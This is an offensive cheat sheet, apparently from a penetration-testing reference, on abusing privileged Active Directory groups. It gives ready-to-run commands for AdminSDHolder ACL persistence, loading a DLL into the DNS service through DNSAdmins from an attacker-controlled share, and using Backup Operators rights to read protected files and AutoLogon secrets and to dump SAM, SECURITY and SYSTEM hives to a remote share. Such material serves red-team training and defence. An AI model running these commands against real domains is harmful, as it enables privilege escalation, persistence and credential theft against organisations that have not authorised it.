6.3 KiB
Active Directory - Groups
Dangerous Built-in Groups Usage
If you do not want modified ACLs to be overwritten every hour, you should change ACL template on the object CN=AdminSDHolder,CN=System
or set "dminCount
attribute to 0
for the required object.
The AdminCount attribute is set to
1
automatically when a user is assigned to any privileged group, but it is never automatically unset when the user is removed from these group(s).
Find users with AdminCount=1
.
crackmapexec ldap 10.10.10.10 -u username -p password --admin-count
# or
bloodyAD --host 10.10.10.10 -d example.lab -u john -p pass123 get search --filter '(admincount=1)' --attr sAMAccountName
# or
python ldapdomaindump.py -u example.com\john -p pass123 -d ';' 10.10.10.10
jq -r '.[].attributes | select(.adminCount == [1]) | .sAMAccountName[]' domain_users.json
# or
Get-ADUser -LDAPFilter "(objectcategory=person)(samaccountname=*)(admincount=1)"
Get-ADGroup -LDAPFilter "(objectcategory=group) (admincount=1)"
# or
([adsisearcher]"(AdminCount=1)").findall()
AdminSDHolder Attribute
The Access Control List (ACL) of the AdminSDHolder object is used as a template to copy permissions to all "protected groups" in Active Directory and their members. Protected groups include privileged groups such as Domain Admins, Administrators, Enterprise Admins, and Schema Admins.
If you modify the permissions of AdminSDHolder, that permission template will be pushed out to all protected accounts automatically by SDProp
(in an hour).
E.g: if someone tries to delete this user from the Domain Admins in an hour or less, the user will be back in the group.
- Windows/Linux:
bloodyAD --host 10.10.10.10 -d example.lab -u john -p pass123 add genericAll 'CN=AdminSDHolder,CN=System,DC=example,DC=lab' john # Clean up after bloodyAD --host 10.10.10.10 -d example.lab -u john -p pass123 remove genericAll 'CN=AdminSDHolder,CN=System,DC=example,DC=lab' john
- Windows only:
# Add a user to the AdminSDHolder group: Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -PrincipalIdentity username -Rights All -Verbose # Right to reset password for toto using the account titi Add-ObjectACL -TargetSamAccountName toto -PrincipalSamAccountName titi -Rights ResetPassword # Give all rights Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName toto -Verbose -Rights All
DNS Admins Group
It is possible for the members of the DNSAdmins group to load arbitrary DLL with the privileges of dns.exe (SYSTEM).
⚠️ Require privileges to restart the DNS service.
- Enumerate members of DNSAdmins group
- Windows/Linux:
bloodyAD --host 10.10.10.10 -d example.lab -u john -p pass123 get object DNSAdmins --attr msds-memberTransitive
- Windows only:
Get-NetGroupMember -GroupName "DNSAdmins" Get-ADGroupMember -Identity DNSAdmins
- Windows/Linux:
- Change dll loaded by the DNS service
# with RSAT dnscmd <servername> /config /serverlevelplugindll \\attacker_IP\dll\mimilib.dll dnscmd 10.10.10.11 /config /serverlevelplugindll \\10.10.10.10\exploit\privesc.dll # with DNSServer module $dnsettings = Get-DnsServerSetting -ComputerName <servername> -Verbose -All $dnsettings.ServerLevelPluginDll = "\attacker_IP\dll\mimilib.dll" Set-DnsServerSetting -InputObject $dnsettings -ComputerName <servername> -Verbose
- Check the previous command success
Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll
- Restart DNS
sc \\dc01 stop dns sc \\dc01 start dns
Schema Admins Group
The Schema Admins group is a security group in Microsoft Active Directory that provides its members with the ability to make changes to the schema of an Active Directory forest. The schema defines the structure of the Active Directory database, including the attributes and object classes that are used to store information about users, groups, computers, and other objects in the directory.
Backup Operators Group
Members of the Backup Operators group can back up and restore all files on a computer, regardless of the permissions that protect those files. Backup Operators also can log on to and shut down the computer. This group cannot be renamed, deleted, or moved. By default, this built-in group has no members, and it can perform backup and restore operations on domain controllers.
This groups grants the following privileges :
- SeBackup privileges
- SeRestore privileges
- Get members of the group:
- Windows/Linux:
bloodyAD --host 10.10.10.10 -d example.lab -u john -p pass123 get object "Backup Operators" --attr msds-memberTransitive
- Windows only:
PowerView> Get-NetGroupMember -Identity "Backup Operators" -Recurse
- Windows/Linux:
- Enable privileges using giuliano108/SeBackupPrivilege
Import-Module .\SeBackupPrivilegeUtils.dll Import-Module .\SeBackupPrivilegeCmdLets.dll Set-SeBackupPrivilege Get-SeBackupPrivilege
- Retrieve sensitive files
Copy-FileSeBackupPrivilege C:\Users\Administrator\flag.txt C:\Users\Public\flag.txt -Overwrite
- Retrieve content of AutoLogon in the HKLM\SOFTWARE hive
$reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine', 'dc.htb.local',[Microsoft.Win32.RegistryView]::Registry64) $winlogon = $reg.OpenSubKey('SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon') $winlogon.GetValueNames() | foreach {"$_ : $(($winlogon).GetValue($_))"}
- Retrieve SAM,SECURITY and SYSTEM hives
- mpgn/BackupOperatorToDA:
.\BackupOperatorToDA.exe -t \\dc1.lab.local -u user -p pass -d domain -o \\10.10.10.10\SHARE\
- improsec/BackupOperatorToolkit:
.\BackupOperatorToolkit.exe DUMP \\PATH\To\Dump \\TARGET.DOMAIN.DK
- mpgn/BackupOperatorToDA: